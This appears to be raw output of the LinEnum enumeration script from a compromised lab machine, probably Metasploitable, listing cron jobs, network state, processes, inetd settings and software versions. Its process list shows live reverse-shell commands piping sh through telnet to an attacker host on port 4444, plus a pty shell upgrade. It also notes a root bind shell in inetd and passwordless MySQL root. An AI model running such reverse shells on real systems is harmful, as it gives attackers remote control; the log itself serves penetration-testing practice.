drwxr-xr-x 2 root root 4096 Apr 28 2010 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 633 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22 2008 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Jun 19 2006 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Apr 28 2010 samba
-rwxr-xr-x 1 root root 3295 Apr 8 2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 477 Dec 7 2008 tomcat55

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 16 2010 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder

/etc/cron.monthly:
total 20
drwxr-xr-x 2 root root 4096 Apr 28 2010 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 664 Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 129 Apr 8 2008 standard

/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Mar 16 2010 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd

Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

### NETWORKING ##########################################
Network & IP info:
eth0 Link encap:Ethernet HWaddr 00:50:56:aa:55:bf
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feaa:55bf/64 Scope:Global
inet6 addr: fe80::250:56ff:feaa:55bf/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:163459 errors:64 dropped:311 overruns:0 frame:0
TX packets:4306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:10439672 (9.9 MB) TX bytes:721734 (704.8 KB)
Interrupt:19 Base address:0x2000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1774 errors:0 dropped:0 overruns:0 frame:0
TX packets:1774 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:861081 (840.8 KB) TX bytes:861081 (840.8 KB)

ARP history:
? (10.10.10.2) at 00:50:56:AA:C2:6E [ether] on eth0

Nameserver(s):
nameserver 10.10.10.2

Default route:
default 10.10.10.2 0.0.0.0 UG 100 0 0 eth0

Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:48456 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:36779 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:35225 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:54617 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.3:57994 10.10.14.5:80 TIME_WAIT -
tcp 0 127 10.10.10.3:47835 10.10.14.5:4444 ESTABLISHED 7007/telnet
tcp 0 0 10.10.10.3:60649 10.10.14.5:4444 ESTABLISHED 6580/telnet
tcp 0 0 10.10.10.3:47834 10.10.14.5:4444 ESTABLISHED 7004/telnet
tcp6 0 0 :::2121 :::* LISTEN -
tcp6 0 0 :::3632 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5432 :::* LISTEN -
tcp6 0 0 ::1:953 :::* LISTEN -

Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 0.0.0.0:38530 0.0.0.0:* -
udp 0 0 10.10.10.3:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.10.3:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 127.0.0.1:161 0.0.0.0:* -
udp 0 0 127.0.0.1:43042 127.0.0.1:43042 ESTABLISHED -
udp 0 0 0.0.0.0:36270 0.0.0.0:* -
udp 0 0 10.10.10.3:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:69 0.0.0.0:* -
udp 0 0 0.0.0.0:995 0.0.0.0:* -
udp 0 0 0.0.0.0:32878 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:57470 0.0.0.0:* -
udp6 0 0 :::53 :::* -
udp6 0 0 :::51560 :::* -

### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 2844 1696 ? Ss 16:21 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 16:21 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S< 16:21 0:00 [migration/0] root 4 0.0 0.0 0 0 ? S< 16:21 0:00 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< 16:21 0:00 [watchdog/0] root 6 0.0 0.0 0 0 ? S< 16:21 0:00 [events/0] root 7 0.0 0.0 0 0 ? S< 16:21 0:00 [khelper] root 41 0.0 0.0 0 0 ? S< 16:21 0:00 [kblockd/0] root 64 0.0 0.0 0 0 ? S< 16:21 0:00 [kseriod] root 182 0.0 0.0 0 0 ? S 16:21 0:00 [pdflush] root 183 0.0 0.0 0 0 ? S 16:21 0:00 [pdflush] root 184 0.0 0.0 0 0 ? S< 16:21 0:00 [kswapd0] root 225 0.0 0.0 0 0 ? S< 16:21 0:00 [aio/0] root 1245 0.0 0.0 0 0 ? S< 16:21 0:00 [ksnapd] root 1436 0.0 0.0 0 0 ? S< 16:21 0:00 [ata/0] root 1439 0.0 0.0 0 0 ? S< 16:21 0:00 [ata_aux] root 1458 0.0 0.0 0 0 ? S< 16:21 0:00 [ksuspend_usbd] root 1462 0.0 0.0 0 0 ? S< 16:21 0:00 [khubd] root 2305 0.0 0.0 0 0 ? S< 16:21 0:00 [scsi_eh_0] root 2486 0.0 0.0 0 0 ? S< 16:21 0:00 [kjournald] root 2552 0.0 0.0 0 0 ? S< 16:21 0:00 [scsi_eh_1] root 2553 0.0 0.0 0 0 ? S< 16:21 0:00 [scsi_eh_2] root 2662 0.0 0.1 2216 648 ? S<s 16:21 0:00 /sbin/udevd --daemon
root 3017 0.0 0.0 0 0 ? S< 16:21 0:00 [kpsmoused] root 3974 0.0 0.0 0 0 ? S< 16:21 0:00 [kjournald] daemon 4193 0.0 0.1 1836 524 ? Ss 16:21 0:00 /sbin/portmap
statd 4211 0.0 0.1 1900 720 ? Ss 16:21 0:00 /sbin/rpc.statd
root 4217 0.0 0.0 0 0 ? S< 16:21 0:00 [rpciod/0] root 4232 0.0 0.1 3648 564 ? Ss 16:21 0:00 /usr/sbin/rpc.idmapd
root 4459 0.0 0.0 1716 488 tty4 Ss+ 16:21 0:00 /sbin/getty 38400 tty4
root 4460 0.0 0.0 1716 488 tty5 Ss+ 16:21 0:00 /sbin/getty 38400 tty5
root 4466 0.0 0.0 1716 488 tty2 Ss+ 16:21 0:00 /sbin/getty 38400 tty2
root 4469 0.0 0.0 1716 488 tty3 Ss+ 16:21 0:00 /sbin/getty 38400 tty3
root 4471 0.0 0.0 1716 492 tty6 Ss+ 16:21 0:00 /sbin/getty 38400 tty6
syslog 4510 0.0 0.1 1936 640 ? Ss 16:21 0:00 /sbin/syslogd -u syslog
root 4561 0.0 0.1 1872 544 ? S 16:21 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog 4563 0.0 0.4 3284 2120 ? Ss 16:21 0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind 4588 0.0 1.4 35408 7680 ? Ssl 16:21 0:00 /usr/sbin/named -u bind
root 4612 0.0 0.1 5312 1024 ? Ss 16:21 0:00 /usr/sbin/sshd
root 4693 0.0 0.2 2768 1304 ? S 16:21 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4735 0.0 3.3 127560 17044 ? Sl 16:21 0:03 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 4737 0.0 0.1 1700 560 ? S 16:21 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres 4816 0.0 0.9 41340 5068 ? S 16:21 0:00 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres 4819 0.0 0.2 41340 1376 ? Ss 16:21 0:03 postgres: writer process
postgres 4820 0.0 0.2 41340 1188 ? Ss 16:21 0:02 postgres: wal writer process
postgres 4821 0.0 0.2 41476 1404 ? Ss 16:21 0:00 postgres: autovacuum launcher process
postgres 4822 0.0 0.2 12660 1152 ? Ss 16:21 0:00 postgres: stats collector process
daemon 4843 0.0 0.0 2316 420 ? SNs 16:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon 4844 0.0 0.1 2316 564 ? SN 16:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root 4898 0.0 0.0 0 0 ? S 16:21 0:00 [lockd] root 4899 0.0 0.0 0 0 ? S< 16:21 0:00 [nfsd4] root 4900 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd] root 4901 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd] root 4902 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd] root 4903 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd] root 4904 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd] root 4905 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd] root 4906 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd] root 4907 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd] root 4911 0.0 0.0 2424 332 ? Ss 16:21 0:00 /usr/sbin/rpc.mountd
root 4979 0.0 0.3 5412 1728 ? Ss 16:21 0:00 /usr/lib/postfix/master
postfix 4983 0.0 0.3 5460 1684 ? S 16:21 0:00 qmgr -l -t fifo -u
root 4987 0.0 0.2 5388 1192 ? Ss 16:21 0:00 /usr/sbin/nmbd -D
root 4989 0.0 0.2 7724 1440 ? Ss 16:21 0:00 /usr/sbin/smbd -D
root 4993 0.0 0.1 7724 816 ? S 16:21 0:00 /usr/sbin/smbd -D
snmp 4995 0.0 0.7 8488 3760 ? S 16:21 0:02 /usr/sbin/snmpd -Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1
root 5012 0.0 0.1 2424 868 ? Ss 16:21 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd 5055 0.0 0.3 9948 1596 ? Ss 16:21 0:00 proftpd: (accepting connections)
daemon 5071 0.0 0.0 1984 420 ? Ss 16:21 0:00 /usr/sbin/atd
root 5084 0.0 0.1 2104 896 ? Ss 16:21 0:00 /usr/sbin/cron
root 5114 0.0 0.0 2052 352 ? Ss 16:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 5115 0.0 0.0 2052 480 ? S 16:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55 5117 0.2 17.3 364160 89660 ? Sl 16:21 0:33 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 5137 0.0 0.4 10596 2556 ? Ss 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5138 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5140 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5142 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5146 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5148 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
root 5158 0.0 5.1 66344 26476 ? Sl 16:21 0:00 /usr/bin/rmiregistry
root 5162 0.2 0.4 12208 2568 ? Sl 16:21 0:26 ruby /usr/sbin/druby_timeserver.rb
root 5174 0.0 0.0 1716 484 tty1 Ss+ 16:21 0:00 /sbin/getty 38400 tty1
root 5176 0.0 0.4 8540 2364 ? S 16:21 0:01 /usr/bin/unrealircd
root 5179 0.0 2.3 14016 12016 ? S 16:21 0:02 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
daemon 5184 0.0 0.1 2316 560 ? SN 16:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root 5188 0.0 0.2 2724 1184 ? S 16:21 0:00 /bin/sh /root/.vnc/xstartup
root 5191 0.0 0.4 5936 2564 ? S 16:21 0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 5194 0.0 0.9 8984 5000 ? S 16:21 0:04 fluxbox
root 5197 0.0 0.3 2852 1548 pts/0 Ss+ 16:21 0:00 -bash
daemon 5238 0.0 0.1 2316 560 ? SN 16:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon 6578 0.0 0.1 3240 844 ? SN 17:13 0:00 sh -c (sleep 4360|telnet 10.10.14.5 4444|while : ; do sh && break; done 2>&1|telnet 10.10.14.5 4444 >/dev/null 2>&1 &)
daemon 6579 0.0 0.2 3240 1468 ? SN 17:13 0:00 sh
daemon 6580 0.0 0.1 3164 1028 ? SN 17:13 0:00 telnet 10.10.14.5 4444
daemon 6588 52.3 0.4 3960 2472 ? RN 17:14 79:40 python -c import pty; pty.spawn("/bin/sh")
daemon 6589 0.0 0.3 3356 1724 pts/1 SNs+ 17:14 0:00 /bin/sh
postfix 7000 0.0 0.3 5420 1644 ? S 19:41 0:00 pickup -l -t fifo -u -c
daemon 7003 0.0 0.1 1848 528 ? SN 19:41 0:00 sleep 4521
daemon 7004 0.0 0.1 3164 1028 ? SN 19:41 0:00 telnet 10.10.14.5 4444
daemon 7005 0.0 0.1 3240 840 ? SN 19:41 0:00 sh -c (sleep 4521|telnet 10.10.14.5 4444|while : ; do sh && break; done 2>&1|telnet 10.10.14.5 4444 >/dev/null 2>&1 &)
daemon 7006 0.0 0.2 3236 1448 ? SN 19:41 0:00 sh
daemon 7007 0.0 0.2 3164 1048 ? SN 19:41 0:00 telnet 10.10.14.5 4444
daemon 7014 0.0 0.4 3960 2472 ? SN 19:42 0:00 python -c import pty; pty.spawn("/bin/sh")
daemon 7015 0.0 0.3 3356 1724 pts/2 SNs 19:42 0:00 /bin/sh
daemon 7027 0.5 0.3 3352 1624 pts/2 RN+ 19:46 0:00 /bin/bash ./LinEnum.sh -t
daemon 7376 0.0 0.1 3352 912 pts/2 RN+ 19:47 0:00 /bin/bash ./LinEnum.sh -t
daemon 7377 0.0 0.1 2364 928 pts/2 RN+ 19:47 0:00 ps aux

Process binaries & associated permissions (from above list):
692K -rwxr-xr-x 1 root root 686K Apr 14 2008 /bin/bash
48K -rwxr-xr-x 1 root root 48K Apr 4 2008 /bin/dd
0 lrwxrwxrwx 1 root root 4 Apr 28 2010 /bin/sh -> bash
16K -rwxr-xr-x 1 root root 15K Apr 14 2008 /sbin/getty
92K -rwxr-xr-x 1 root root 88K Apr 11 2008 /sbin/init
24K -rwxr-xr-x 1 root root 23K Nov 23 2007 /sbin/klogd
16K -rwxr-xr-x 1 root root 15K Dec 3 2007 /sbin/portmap
40K -rwxr-xr-x 1 root root 39K Dec 2 2008 /sbin/rpc.statd
32K -rwxr-xr-x 1 root root 32K Nov 23 2007 /sbin/syslogd
72K -rwxr-xr-x 1 root root 67K Apr 11 2008 /sbin/udevd
32K -rwxr-xr-x 1 root root 31K May 21 2007 /usr/bin/jsvc
0 lrwxrwxrwx 1 root root 29 Apr 28 2010 /usr/bin/rmiregistry -> /etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20 2012 /usr/bin/unrealircd
28K -rwxr-xr-x 1 root root 28K Apr 18 2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21 2008 /usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar 9 2010 /usr/sbin/apache2
16K -rwxr-xr-x 1 root root 16K Feb 20 2007 /usr/sbin/atd
32K -rwxr-xr-x 1 root root 31K Apr 8 2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28 2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr 9 2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28 2010 /usr/sbin/nmbd
36K -rwxr-xr-x 1 root root 35K Dec 2 2008 /usr/sbin/rpc.idmapd
76K -rwxr-xr-x 1 root root 72K Dec 2 2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28 2010 /usr/sbin/smbd
24K -rwxr-xr-x 1 root root 24K Sep 24 2009 /usr/sbin/snmpd
368K -rwxr-xr-x 1 root root 363K Apr 6 2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec 3 2007 /usr/sbin/xinetd

Contents of /etc/inetd.conf:
#<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd
#<off># ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
tftp dgram udp wait nobody /usr/sbin/tcpd /usr/sbin/in.tftpd /srv/tftp
shell stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rshd
login stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rlogind
exec stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rexecd
ingreslock stream tcp nowait root /bin/bash bash -i

The related inetd binary permissions:
-rwxr-xr-x 1 root root 8216 Nov 22 2007 /usr/sbin/in.rexecd
-rwxr-xr-x 1 root root 15620 Nov 22 2007 /usr/sbin/in.rlogind
-rwxr-xr-x 1 root root 14684 Nov 22 2007 /usr/sbin/in.rshd
-rwxr-xr-x 1 root root 36504 Dec 17 2006 /usr/sbin/in.telnetd
-rwxr-xr-x 1 root root 11596 Dec 17 2006 /usr/sbin/in.tftpd
-rwxr-xr-x 1 root root 4504 Jul 30 2007 /usr/sbin/tcpd
-rwxr-xr-x 1 root root 4504 Jul 30 2007 /usr/sbin/tcpd

Contents of /etc/xinetd.conf:
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{

# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info

}

includedir /etc/xinetd.d

/etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below: ls -la /etc/xinetd.d

/etc/init.d/ binary permissions:
total 376
drwxr-xr-x 2 root root 4096 May 20 2012 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 1335 Apr 19 2008 README
-rwxr-xr-x 1 root root 5736 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 2653 Apr 7 2008 apparmor
-rwxr-xr-x 1 root root 969 Feb 20 2007 atd
-rwxr-xr-x 1 root root 2426 Apr 9 2008 bind9
-rwxr-xr-x 1 root root 3597 Apr 19 2008 bootclean
-rwxr-xr-x 1 root root 2121 Apr 19 2008 bootlogd
-rwxr-xr-x 1 root root 1768 Apr 19 2008 bootmisc.sh
-rwxr-xr-x 1 root root 3454 Apr 19 2008 checkfs.sh
-rwxr-xr-x 1 root root 10602 Apr 19 2008 checkroot.sh
-rwxr-xr-x 1 root root 6355 May 30 2007 console-screen.sh
-rwxr-xr-x 1 root root 1634 Jan 28 2008 console-setup
-rwxr-xr-x 1 root root 1761 Apr 8 2008 cron
-rwxr-xr-x 1 root root 429 May 14 2012 distcc
-rwxr-xr-x 1 root root 1223 Jun 22 2007 dns-clean
-rwxr-xr-x 1 root root 7195 Apr 4 2008 glibc.sh
-rwxr-xr-x 1 root root 1228 Apr 19 2008 halt
-rwxr-xr-x 1 root root 909 Apr 19 2008 hostname.sh
-rwxr-xr-x 1 root root 4521 Apr 14 2008 hwclock.sh
-rwxr-xr-x 1 root root 4528 Apr 14 2008 hwclockfirst.sh
-rwxr-xr-x 1 root root 1376 Jan 28 2008 keyboard-setup
-rwxr-xr-x 1 root root 944 Apr 19 2008 killprocs
-rwxr-xr-x 1 root root 1729 Nov 23 2007 klogd
-rwxr-xr-x 1 root root 748 Jan 23 2006 loopback
-rwxr-xr-x 1 root root 1399 Feb 25 2008 module-init-tools
-rwxr-xr-x 1 root root 596 Apr 19 2008 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2430 Apr 19 2008 mountall.sh
-rwxr-xr-x 1 root root 1465 Apr 19 2008 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1544 Apr 19 2008 mountkernfs.sh
-rwxr-xr-x 1 root root 594 Apr 19 2008 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 1244 Apr 19 2008 mountoverflowtmp
-rwxr-xr-x 1 root root 3123 Apr 19 2008 mtab.sh
-rwxr-xr-x 1 root root 5755 Mar 27 2008 mysql
-rwxr-xr-x 1 root root 2515 Mar 27 2008 mysql-ndb
-rwxr-xr-x 1 root root 1905 Mar 27 2008 mysql-ndb-mgm
-rwxr-xr-x 1 root root 1772 Dec 3 2007 networking
-rwxr-xr-x 1 root root 5942 Dec 2 2008 nfs-common
-rwxr-xr-x 1 root root 4411 Dec 2 2008 nfs-kernel-server
-rwxr-xr-x 1 root root 2324 Apr 27 2007 openbsd-inetd
-rwxr-xr-x 1 root root 2377 Oct 23 2007 pcmciautils
-rwxr-xr-x 1 root root 1872 Dec 3 2007 portmap
-rwxr-xr-x 1 root root 4202 Apr 18 2008 postfix
-rwxr-xr-x 1 root root 1170 Mar 21 2008 postgresql-8.3
-rwxr-xr-x 1 root root 375 Oct 4 2007 pppd-dns
-rwxr-xr-x 1 root root 1261 Mar 13 2008 procps
-rwxr-xr-x 1 root root 4848 Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 7891 Apr 19 2008 rc
-rwxr-xr-x 1 root root 522 Apr 19 2008 rc.local
-rwxr-xr-x 1 root root 117 Apr 19 2008 rcS
-rwxr-xr-x 1 root root 692 Apr 19 2008 reboot
-rwxr-xr-x 1 root root 1000 Apr 19 2008 rmnologin
-rwxr-xr-x 1 root root 4945 Apr 10 2008 rsync
-rwxr-xr-x 1 root root 1763 May 25 2004 samba
-rwxr-xr-x 1 root root 955 Oct 23 2007 screen-cleanup
-rwxr-xr-x 1 root root 1199 Apr 19 2008 sendsigs
-rwxr-xr-x 1 root root 585 Apr 19 2008 single
-rwxr-xr-x 1 root root 4215 Apr 19 2008 skeleton
-rwxr-xr-x 1 root root 2747 Sep 24 2009 snmpd
-rwxr-xr-x 1 root root 3839 Apr 6 2008 ssh
-rwxr-xr-x 1 root root 510 Apr 19 2008 stop-bootlogd
-rwxr-xr-x 1 root root 647 Apr 19 2008 stop-bootlogd-single
-rwxr-xr-x 1 root root 3343 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 6860 Dec 7 2008 tomcat5.5
-rwxr-xr-x 1 root root 2488 Apr 11 2008 udev
-rwxr-xr-x 1 root root 706 Apr 11 2008 udev-finish
-rwxr-xr-x 1 root root 6358 Apr 7 2008 ufw
-rwxr-xr-x 1 root root 4030 Apr 19 2008 umountfs
-rwxr-xr-x 1 root root 1833 Apr 19 2008 umountnfs.sh
-rwxr-xr-x 1 root root 1863 Apr 19 2008 umountroot
-rwxr-xr-x 1 root root 1815 Apr 19 2008 urandom
-rwxr-xr-x 1 root root 2445 Apr 19 2008 waitnfs.sh
-rwxr-xr-x 1 root root 1626 Mar 12 2008 wpa-ifupdown
-rwxr-xr-x 1 root root 1843 May 13 2008 x11-common
-rwxr-xr-x 1 root root 1896 Dec 3 2007 xinetd
-rwxr-xr-x 1 root root 568 Mar 30 2008 xserver-xorg-input-wacom

### SOFTWARE #############################################
Sudo version:
Sudo version 1.6.9p10

MYSQL version:
mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

***We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version 5.0.51a-3ubuntu5
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 3 hours 25 min 31 sec

